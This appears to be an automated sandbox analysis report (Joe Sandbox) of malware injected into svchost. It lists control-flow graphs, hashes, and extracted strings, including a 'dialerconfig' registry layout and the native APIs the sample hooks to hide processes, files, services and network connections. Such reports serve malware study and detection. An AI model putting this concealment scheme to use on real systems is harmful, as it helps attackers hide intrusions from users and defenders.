                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: 5e99e09a81be74683ec0735598f19b3f298f7555a9f3a34255cc78f9c769c029
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: 61D05E21F3964A8EFF969FA1A9897602360AB04724F4480208F0902114E718898D9E10

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 66c3075ca0285acc7c6d9f9d6f17fe1fc06f5ec9c51786bd45666383cfa4d708
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: CB61343A3216508BFB6ACF25E64876DB391FF45B94F548021DB1907B89DB38E853DB20

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 127 29b923ab860-29b923ab86f 128 29b923ab871-29b923ab87d 127->128 129 29b923ab87f-29b923ab88f 127->129 128->129 130 29b923ab8c2-29b923ab8cd call 29b923ab840 128->130 131 29b923ab8a6-29b923ab8be HeapAlloc 129->131 135 29b923ab8cf-29b923ab8d4 130->135 132 29b923ab891-29b923ab898 call 29b923ae650 131->132 133 29b923ab8c0 131->133 132->130 139 29b923ab89a-29b923ab8a4 call 29b923a9d24 132->139 133->135 139->130 139->131
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocHeap
                                                • String ID:
                                                • API String ID: 4292702814-0
                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction ID: 21f0956d369b2fd1989298c4a3e8b2e9cd9d68041f40b3d614bf662d11e29f15
                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction Fuzzy Hash: 93F09094F2928589FF576F6AB71D3A532CA6F65B60F4E48308F0A863D2DF2CC4854A10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 112 29b9234b860-29b9234b86f 113 29b9234b87f-29b9234b88f 112->113 114 29b9234b871-29b9234b87d 112->114 116 29b9234b8a6-29b9234b8be HeapAlloc 113->116 114->113 115 29b9234b8c2-29b9234b8cd call 29b9234b840 114->115 120 29b9234b8cf-29b9234b8d4 115->120 117 29b9234b8c0 116->117 118 29b9234b891-29b9234b898 call 29b9234e650 116->118 117->120 118->115 124 29b9234b89a-29b9234b8a4 call 29b92349d24 118->124 124->115 124->116
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocHeap
                                                • String ID:
                                                • API String ID: 4292702814-0
                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction ID: ab9c8350d501b43e1f202ce727287e6d5da441a2c231595fbdd7a95b0088cbc8
                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                • Instruction Fuzzy Hash: FEF09040F2928589FF576F62BB0839512D26F48B60F0C44708F0A863C2EF2CC4454A10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 423 29b923a2cdc-29b923a2d55 call 29b923becc0 426 29b923a2d5b-29b923a2d61 423->426 427 29b923a3090-29b923a30b3 423->427 426->427 428 29b923a2d67-29b923a2d6a 426->428 428->427 429 29b923a2d70-29b923a2d73 428->429 429->427 430 29b923a2d79-29b923a2d89 GetModuleHandleA 429->430 431 29b923a2d9d 430->431 432 29b923a2d8b-29b923a2d9b call 29b923b3090 430->432 434 29b923a2da0-29b923a2dbe 431->434 432->434 434->427 437 29b923a2dc4-29b923a2de3 StrCmpNIW 434->437 437->427 438 29b923a2de9-29b923a2ded 437->438 438->427 439 29b923a2df3-29b923a2dfd 438->439 439->427 440 29b923a2e03-29b923a2e0a 439->440 440->427 441 29b923a2e10-29b923a2e23 440->441 442 29b923a2e25-29b923a2e31 441->442 443 29b923a2e33 441->443 444 29b923a2e36-29b923a2e3a 442->444 443->444 445 29b923a2e4a 444->445 446 29b923a2e3c-29b923a2e48 444->446 447 29b923a2e4d-29b923a2e57 445->447 446->447 448 29b923a2f4d-29b923a2f51 447->448 449 29b923a2e5d-29b923a2e60 447->449 450 29b923a2f57-29b923a2f5a 448->450 451 29b923a3082-29b923a308a 448->451 452 29b923a2e72-29b923a2e7c 449->452 453 29b923a2e62-29b923a2e6f call 29b923a1a14 449->453 454 29b923a2f6b-29b923a2f75 450->454 455 29b923a2f5c-29b923a2f68 call 29b923a1a14 450->455 451->427 451->441 457 29b923a2e7e-29b923a2e8b 452->457 458 29b923a2eb0-29b923a2eba 452->458 453->452 462 29b923a2fa5-29b923a2fa8 454->462 463 29b923a2f77-29b923a2f84 454->463 455->454 457->458 465 29b923a2e8d-29b923a2e9a 457->465 459 29b923a2eea-29b923a2eed 458->459 460 29b923a2ebc-29b923a2ec9 458->460 467 29b923a2efb-29b923a2f08 lstrlenW 459->467 468 29b923a2eef-29b923a2ef9 call 29b923a1d28 459->468 460->459 466 29b923a2ecb-29b923a2ed8 460->466 471 29b923a2fb5-29b923a2fc2 lstrlenW 462->471 472 29b923a2faa-29b923a2fb3 call 29b923a1d28 462->472 463->462 470 29b923a2f86-29b923a2f93 463->470 473 29b923a2e9d-29b923a2ea3 465->473 476 29b923a2edb-29b923a2ee1 466->476 478 29b923a2f0a-29b923a2f14 467->478 479 29b923a2f2b-29b923a2f3d call 29b923a3930 467->479 468->467 482 29b923a2f43-29b923a2f48 468->482 480 29b923a2f96-29b923a2f9c 470->480 474 29b923a2fe5-29b923a2fef call 29b923a3930 471->474 475 29b923a2fc4-29b923a2fce 471->475 472->471 490 29b923a2ffa-29b923a3005 472->490 473->482 483 29b923a2ea9-29b923a2eae 473->483 485 29b923a2ff2-29b923a2ff4 474->485 475->474 484 29b923a2fd0-29b923a2fe3 call 29b923a1554 475->484 476->482 486 29b923a2ee3-29b923a2ee8 476->486 478->479 489 29b923a2f16-29b923a2f29 call 29b923a1554 478->489 479->482 479->485 480->490 491 29b923a2f9e-29b923a2fa3 480->491 482->485 483->458 483->473 484->474 484->490 485->451 485->490 486->459 486->476 489->479 489->482 496 29b923a3007-29b923a300b 490->496 497 29b923a307c-29b923a3080 490->497 491->462 491->480 501 29b923a3013-29b923a302d call 29b923a86a0 496->501 502 29b923a300d-29b923a3011 496->502 497->451 504 29b923a3030-29b923a3033 501->504 502->501 502->504 507 29b923a3035-29b923a3053 call 29b923a86a0 504->507 508 29b923a3056-29b923a3059 504->508 507->508 508->497 510 29b923a305b-29b923a3079 call 29b923a86a0 508->510 510->497
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 776eacdfa51c99bee4d3fba1db5e26db6f0513538c36716626e5efed290943a5
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 7AB1C232E38A5089FB5A8F26E7487A9B3A4F744BA4F455026EF4A53794DF35CC80CB40

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 332 29b92342cdc-29b92342d55 call 29b9235ecc0 335 29b92343090-29b923430b3 332->335 336 29b92342d5b-29b92342d61 332->336 336->335 337 29b92342d67-29b92342d6a 336->337 337->335 338 29b92342d70-29b92342d73 337->338 338->335 339 29b92342d79-29b92342d89 GetModuleHandleA 338->339 340 29b92342d8b-29b92342d9b call 29b92353090 339->340 341 29b92342d9d 339->341 342 29b92342da0-29b92342dbe 340->342 341->342 342->335 346 29b92342dc4-29b92342de3 StrCmpNIW 342->346 346->335 347 29b92342de9-29b92342ded 346->347 347->335 348 29b92342df3-29b92342dfd 347->348 348->335 349 29b92342e03-29b92342e0a 348->349 349->335 350 29b92342e10-29b92342e23 349->350 351 29b92342e33 350->351 352 29b92342e25-29b92342e31 350->352 353 29b92342e36-29b92342e3a 351->353 352->353 354 29b92342e3c-29b92342e48 353->354 355 29b92342e4a 353->355 356 29b92342e4d-29b92342e57 354->356 355->356 357 29b92342f4d-29b92342f51 356->357 358 29b92342e5d-29b92342e60 356->358 361 29b92343082-29b9234308a 357->361 362 29b92342f57-29b92342f5a 357->362 359 29b92342e72-29b92342e7c 358->359 360 29b92342e62-29b92342e6f call 29b92341a14 358->360 364 29b92342eb0-29b92342eba 359->364 365 29b92342e7e-29b92342e8b 359->365 360->359 361->335 361->350 366 29b92342f6b-29b92342f75 362->366 367 29b92342f5c-29b92342f68 call 29b92341a14 362->367 372 29b92342ebc-29b92342ec9 364->372 373 29b92342eea-29b92342eed 364->373 365->364 371 29b92342e8d-29b92342e9a 365->371 368 29b92342f77-29b92342f84 366->368 369 29b92342fa5-29b92342fa8 366->369 367->366 368->369 375 29b92342f86-29b92342f93 368->375 376 29b92342faa-29b92342fb3 call 29b92341d28 369->376 377 29b92342fb5-29b92342fc2 lstrlenW 369->377 378 29b92342e9d-29b92342ea3 371->378 372->373 379 29b92342ecb-29b92342ed8 372->379 380 29b92342eef-29b92342ef9 call 29b92341d28 373->380 381 29b92342efb-29b92342f08 lstrlenW 373->381 384 29b92342f96-29b92342f9c 375->384 376->377 395 29b92342ffa-29b92343005 376->395 390 29b92342fc4-29b92342fce 377->390 391 29b92342fe5-29b92342fef call 29b92343930 377->391 388 29b92342ea9-29b92342eae 378->388 389 29b92342f43-29b92342f48 378->389 392 29b92342edb-29b92342ee1 379->392 380->381 380->389 385 29b92342f2b-29b92342f3d call 29b92343930 381->385 386 29b92342f0a-29b92342f14 381->386 394 29b92342f9e-29b92342fa3 384->394 384->395 385->389 399 29b92342ff2-29b92342ff4 385->399 386->385 396 29b92342f16-29b92342f29 call 29b92341554 386->396 388->364 388->378 389->399 390->391 400 29b92342fd0-29b92342fe3 call 29b92341554 390->400 391->399 392->389 401 29b92342ee3-29b92342ee8 392->401 394->369 394->384 404 29b9234307c-29b92343080 395->404 405 29b92343007-29b9234300b 395->405 396->385 396->389 399->361 399->395 400->391 400->395 401->373 401->392 404->361 409 29b9234300d-29b92343011 405->409 410 29b92343013-29b9234302d call 29b923486a0 405->410 409->410 413 29b92343030-29b92343033 409->413 410->413 416 29b92343035-29b92343053 call 29b923486a0 413->416 417 29b92343056-29b92343059 413->417 416->417 417->404 419 29b9234305b-29b92343079 call 29b923486a0 417->419 419->404
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 4a0afcd44b21c76f16c6e43cac0ed3154a0ad7e623a1261c59f00051067489f4
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 35B1D222E38A5089FF568F26E6487A963A4FB44BA4F545196EF0E63794DF35CC80CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 1d94c29b4dc0df67a99fe5fee212b0d089e900caa69dc19dff07c4a222663956
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 1E315E76A29B808AFB618F60F8847EE7360F784754F44442ADB4D47B98EF38C648CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 3b4b057829b57ca63e4fc0b209ca7750037d932c767e0b41cc277afcc155a676
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 0B318E72A29B808AFB619F60F8447EE7361F784754F44452ADB4E47B98EF38C648CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 092feae468fda326dae7e027b6ddc3c24d84675113ff869bdf37d8ca371a037f
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: A9315C36A28F808AFB61CF25E9443AE73A4F798764F510126EB9D47BA4DF38C5458B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: beb2bd4788e2da15fd7c812ee1c2a6f3390965935010381497ca5efa73eaf47c
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 9DE1CE36E29A80AEF702CF75E2882AD7BB1F3457A8F144116DF4A57B99DB34C516CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 603ef9abfe46e083a65ece6363720705daa0552c9aa1682878091de31fa4e3f9
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 62E1DF22F29A809EF702CB64E28869D7BB1F34A7A8F144116DF4E57B99DB35C516CB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: e5beb116b88e31b6b3af751823b61ee1a7f3008600d35a442f504c12ce16f1ac
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 96710B3AF24A5489FB119F75F9586A937B4FB84BA8F011122DB8E57A28DF38C445CB40

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: e8bf89fdfaded7759334b5be4fb4eefde9002034faccd2838ee5f45d1fa9a0f2
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 43710B26F28F5089FB129F65F958A9927B4FB84BA8F405111DF8E57B28EF38C445CB40

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: ec7fa8a03897a198e65e11520e38f9644e0c523717f83329baa8039eef50814d
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: EE518076E28B549BFB15DF66F6483AA73A5F788B90F044125DB8907B14DF38D056CB00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: bdb8cd8fd32e58f5c9a30b196687bf1509b21466849ff519062b8239c013ecfd
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: C1515E72A28B449BFB16DF62F64879AB3A1F788B90F448124DB8D07B14DF38C156CB40

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 69be0b974d20119d684355802709a2a479446954a97314209a85b62e781b3225
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 4531D568E39D0AA8FB47DF7AFB496E43320B745364FC24423DB09121659F38864ACF90

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: d00ac7caf2c78e3e1b6f4d2fb9c1e88055c9346dc5458434f8cf04de3b049631
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: AB319360D3894AA8FF07EF66FB59AD42331AB84364FC14493E71D221659F38C64ADB80
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: fa10133c3d7138c3e1ea23b83ec8bd54cea43b4f486ff9435b2063b7ba863de6
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 5E211D3AE2CA5096F7119F25F64836A77A0F789BA4F504215EB5A02BA8DF3CC149CF00

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 9945212eb12b37fb5cdb8075cf828276fabe8e0846eaf5704bde08a6b45d0c46
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 1D211D36E28B4086FB119B25F64875A67A0F789BA4F504215EB5E07BA8DF3CC149CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: a3d15db5dad924713430c0d6351fe8cea023a432554b11e71500a39aabec8c71
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 38417177A28B909BF7618F61F5487AAB7A5F388B94F008125DBC907B54DF38D165CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 5a3345180ba77e91fcfb3d5dafcc5f5a5b901078189b5bf33f35895e63f2c491
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: AE416033A28B809BFB658F62F54879AB7A1F389B94F008125DB8907B54DF38D565CF40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: f4ec00be3cc19c2d5ffb9c0785d9e5330584c3043609396db8f027f979352358
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 138108297306818EFB63EB29B7493592AD0EF45B80FC44025EB5443F96DB38C445BFA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: fc6a2031c452aeefa9ce90f2c8667e81ed007471b5dcdfc0eca9a460d80990fa
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 5A81A221F3C6418EFB57AB29BACD3BD7394AB857A0F1A40359B0947796DB38C8418F00
                                                APIs
                                                Memory Dump Source
